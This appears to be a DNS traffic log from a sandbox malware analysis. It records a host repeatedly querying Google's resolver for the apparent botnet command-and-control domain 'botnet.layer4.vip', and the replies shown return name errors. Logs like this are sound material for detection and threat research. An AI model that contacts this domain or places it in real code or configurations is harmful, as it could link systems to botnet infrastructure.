                                  Apr 9, 2023 03:32:26.734910011 CEST192.168.2.238.8.8.80x9e4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.750803947 CEST192.168.2.238.8.8.80x9e4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.775129080 CEST192.168.2.238.8.8.80x9e4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.799544096 CEST192.168.2.238.8.8.80x9e4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.815119028 CEST192.168.2.238.8.8.80xf2e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.839270115 CEST192.168.2.238.8.8.80xf2e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.855112076 CEST192.168.2.238.8.8.80xf2e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.879605055 CEST192.168.2.238.8.8.80xf2e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.904115915 CEST192.168.2.238.8.8.80xf2e3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.928251982 CEST192.168.2.238.8.8.80xf190Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.952318907 CEST192.168.2.238.8.8.80xf190Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.968071938 CEST192.168.2.238.8.8.80xf190Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.992069960 CEST192.168.2.238.8.8.80xf190Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.016402960 CEST192.168.2.238.8.8.80xf190Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.040678024 CEST192.168.2.238.8.8.80xe509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.064793110 CEST192.168.2.238.8.8.80xe509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.088911057 CEST192.168.2.238.8.8.80xe509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.113046885 CEST192.168.2.238.8.8.80xe509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.128854990 CEST192.168.2.238.8.8.80xe509Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.144622087 CEST192.168.2.238.8.8.80xe6eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.160033941 CEST192.168.2.238.8.8.80xe6eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.175893068 CEST192.168.2.238.8.8.80xe6eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.200316906 CEST192.168.2.238.8.8.80xe6eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.224426031 CEST192.168.2.238.8.8.80xe6eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.240345001 CEST192.168.2.238.8.8.80x658Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.256860018 CEST192.168.2.238.8.8.80x658Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.280986071 CEST192.168.2.238.8.8.80x658Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.305994034 CEST192.168.2.238.8.8.80x658Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.331392050 CEST192.168.2.238.8.8.80x658Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.355926037 CEST192.168.2.238.8.8.80x5b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.371732950 CEST192.168.2.238.8.8.80x5b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.387321949 CEST192.168.2.238.8.8.80x5b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.411761999 CEST192.168.2.238.8.8.80x5b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.427581072 CEST192.168.2.238.8.8.80x5b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.443048954 CEST192.168.2.238.8.8.80x851eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.458949089 CEST192.168.2.238.8.8.80x851eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.483042002 CEST192.168.2.238.8.8.80x851eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.498487949 CEST192.168.2.238.8.8.80x851eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.522552967 CEST192.168.2.238.8.8.80x851eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.547012091 CEST192.168.2.238.8.8.80x853fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.562886953 CEST192.168.2.238.8.8.80x853fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.586884022 CEST192.168.2.238.8.8.80x853fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.611331940 CEST192.168.2.238.8.8.80x853fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.637110949 CEST192.168.2.238.8.8.80x853fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.653506041 CEST192.168.2.238.8.8.80x614cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.669387102 CEST192.168.2.238.8.8.80x614cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.693818092 CEST192.168.2.238.8.8.80x614cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.718271017 CEST192.168.2.238.8.8.80x614cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.733942986 CEST192.168.2.238.8.8.80x614cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.758399963 CEST192.168.2.238.8.8.80x8454Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.774101973 CEST192.168.2.238.8.8.80x8454Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.789715052 CEST192.168.2.238.8.8.80x8454Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.805250883 CEST192.168.2.238.8.8.80x8454Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.820851088 CEST192.168.2.238.8.8.80x8454Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.836788893 CEST192.168.2.238.8.8.80xdb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.861144066 CEST192.168.2.238.8.8.80xdb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.876722097 CEST192.168.2.238.8.8.80xdb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.892198086 CEST192.168.2.238.8.8.80xdb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.908040047 CEST192.168.2.238.8.8.80xdb6aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.923604012 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.947640896 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.963145971 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.987181902 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.011571884 CEST192.168.2.238.8.8.80x7d05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.035695076 CEST192.168.2.238.8.8.80x453cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.051263094 CEST192.168.2.238.8.8.80x453cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.075361013 CEST192.168.2.238.8.8.80x453cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.099714041 CEST192.168.2.238.8.8.80x453cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.115515947 CEST192.168.2.238.8.8.80x453cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.131325006 CEST192.168.2.238.8.8.80xb58dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.147160053 CEST192.168.2.238.8.8.80xb58dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.162736893 CEST192.168.2.238.8.8.80xb58dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.178244114 CEST192.168.2.238.8.8.80xb58dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.193702936 CEST192.168.2.238.8.8.80xb58dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.209295034 CEST192.168.2.238.8.8.80xbe31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.224868059 CEST192.168.2.238.8.8.80xbe31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.240453959 CEST192.168.2.238.8.8.80xbe31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.256073952 CEST192.168.2.238.8.8.80xbe31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.272109032 CEST192.168.2.238.8.8.80xbe31Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.296717882 CEST192.168.2.238.8.8.80xcfffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.312961102 CEST192.168.2.238.8.8.80xcfffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.337551117 CEST192.168.2.238.8.8.80xcfffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.353585005 CEST192.168.2.238.8.8.80xcfffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.371593952 CEST192.168.2.238.8.8.80xcfffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.387465954 CEST192.168.2.238.8.8.80xd567Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.411542892 CEST192.168.2.238.8.8.80xd567Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.435523987 CEST192.168.2.238.8.8.80xd567Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.460690022 CEST192.168.2.238.8.8.80xd567Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.485243082 CEST192.168.2.238.8.8.80xd567Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.511290073 CEST192.168.2.238.8.8.80xea40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.535821915 CEST192.168.2.238.8.8.80xea40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.551748991 CEST192.168.2.238.8.8.80xea40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.567229986 CEST192.168.2.238.8.8.80xea40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.591638088 CEST192.168.2.238.8.8.80xea40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.615717888 CEST192.168.2.238.8.8.80xbb92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.639837980 CEST192.168.2.238.8.8.80xbb92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.663932085 CEST192.168.2.238.8.8.80xbb92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.687942028 CEST192.168.2.238.8.8.80xbb92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.703413010 CEST192.168.2.238.8.8.80xbb92Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.733876944 CEST192.168.2.238.8.8.80x9cf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.749742985 CEST192.168.2.238.8.8.80x9cf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.765256882 CEST192.168.2.238.8.8.80x9cf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.789769888 CEST192.168.2.238.8.8.80x9cf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.814191103 CEST192.168.2.238.8.8.80x9cf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.838344097 CEST192.168.2.238.8.8.80xeb32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.854178905 CEST192.168.2.238.8.8.80xeb32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.878321886 CEST192.168.2.238.8.8.80xeb32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.893805027 CEST192.168.2.238.8.8.80xeb32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.918394089 CEST192.168.2.238.8.8.80xeb32Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.934480906 CEST192.168.2.238.8.8.80xb9a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.950102091 CEST192.168.2.238.8.8.80xb9a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.965711117 CEST192.168.2.238.8.8.80xb9a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.981405973 CEST192.168.2.238.8.8.80xb9a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.997051001 CEST192.168.2.238.8.8.80xb9a8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.021426916 CEST192.168.2.238.8.8.80x7b60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.037370920 CEST192.168.2.238.8.8.80x7b60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.061765909 CEST192.168.2.238.8.8.80x7b60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.077717066 CEST192.168.2.238.8.8.80x7b60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.093682051 CEST192.168.2.238.8.8.80x7b60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.118344069 CEST192.168.2.238.8.8.80x5482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.142954111 CEST192.168.2.238.8.8.80x5482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.159046888 CEST192.168.2.238.8.8.80x5482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.183564901 CEST192.168.2.238.8.8.80x5482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.208266020 CEST192.168.2.238.8.8.80x5482Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.232664108 CEST192.168.2.238.8.8.80xf6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.248651981 CEST192.168.2.238.8.8.80xf6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.264219999 CEST192.168.2.238.8.8.80xf6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.288417101 CEST192.168.2.238.8.8.80xf6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.304038048 CEST192.168.2.238.8.8.80xf6cdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.319953918 CEST192.168.2.238.8.8.80x2350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.344316006 CEST192.168.2.238.8.8.80x2350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.359812975 CEST192.168.2.238.8.8.80x2350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.383919001 CEST192.168.2.238.8.8.80x2350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.408031940 CEST192.168.2.238.8.8.80x2350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.423548937 CEST192.168.2.238.8.8.80x159Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.447930098 CEST192.168.2.238.8.8.80x159Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.463748932 CEST192.168.2.238.8.8.80x159Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.487792015 CEST192.168.2.238.8.8.80x159Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.503297091 CEST192.168.2.238.8.8.80x159Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.519359112 CEST192.168.2.238.8.8.80x7794Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.534885883 CEST192.168.2.238.8.8.80x7794Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.558980942 CEST192.168.2.238.8.8.80x7794Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.583154917 CEST192.168.2.238.8.8.80x7794Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.607570887 CEST192.168.2.238.8.8.80x7794Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.631985903 CEST192.168.2.238.8.8.80x29b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.656366110 CEST192.168.2.238.8.8.80x29b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.680855036 CEST192.168.2.238.8.8.80x29b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.696690083 CEST192.168.2.238.8.8.80x29b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.721132994 CEST192.168.2.238.8.8.80x29b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.736982107 CEST192.168.2.238.8.8.80x549Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.761074066 CEST192.168.2.238.8.8.80x549Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.785536051 CEST192.168.2.238.8.8.80x549Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.801095963 CEST192.168.2.238.8.8.80x549Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.825227022 CEST192.168.2.238.8.8.80x549Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.849654913 CEST192.168.2.238.8.8.80x53c6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.865525007 CEST192.168.2.238.8.8.80x53c6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.889527082 CEST192.168.2.238.8.8.80x53c6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.904983044 CEST192.168.2.238.8.8.80x53c6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.920841932 CEST192.168.2.238.8.8.80x53c6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.945036888 CEST192.168.2.238.8.8.80x95fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.960853100 CEST192.168.2.238.8.8.80x95fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.985057116 CEST192.168.2.238.8.8.80x95fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.009661913 CEST192.168.2.238.8.8.80x95fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.025511026 CEST192.168.2.238.8.8.80x95fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.049736023 CEST192.168.2.238.8.8.80xe56bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.074152946 CEST192.168.2.238.8.8.80xe56bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.098704100 CEST192.168.2.238.8.8.80xe56bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.114520073 CEST192.168.2.238.8.8.80xe56bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.129966974 CEST192.168.2.238.8.8.80xe56bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.145505905 CEST192.168.2.238.8.8.80xa771Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.161279917 CEST192.168.2.238.8.8.80xa771Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.185615063 CEST192.168.2.238.8.8.80xa771Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.201466084 CEST192.168.2.238.8.8.80xa771Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.225826979 CEST192.168.2.238.8.8.80xa771Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.241349936 CEST192.168.2.238.8.8.80xa690Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.265722036 CEST192.168.2.238.8.8.80xa690Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.281538010 CEST192.168.2.238.8.8.80xa690Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.297312021 CEST192.168.2.238.8.8.80xa690Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.321716070 CEST192.168.2.238.8.8.80xa690Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.337284088 CEST192.168.2.238.8.8.80xb0c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.353060961 CEST192.168.2.238.8.8.80xb0c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.377183914 CEST192.168.2.238.8.8.80xb0c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.392695904 CEST192.168.2.238.8.8.80xb0c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.408483028 CEST192.168.2.238.8.8.80xb0c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.432570934 CEST192.168.2.238.8.8.80x6519Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.448054075 CEST192.168.2.238.8.8.80x6519Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.463578939 CEST192.168.2.238.8.8.80x6519Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.478949070 CEST192.168.2.238.8.8.80x6519Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.503349066 CEST192.168.2.238.8.8.80x6519Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.527791023 CEST192.168.2.238.8.8.80x942cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.543299913 CEST192.168.2.238.8.8.80x942cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Apr 9, 2023 03:30:28.717848063 CEST8.8.8.8192.168.2.230xa4f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.734497070 CEST8.8.8.8192.168.2.230xa4f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.758955956 CEST8.8.8.8192.168.2.230xa4f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.774596930 CEST8.8.8.8192.168.2.230xa4f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.799186945 CEST8.8.8.8192.168.2.230xa4f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.816204071 CEST8.8.8.8192.168.2.230x6af1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
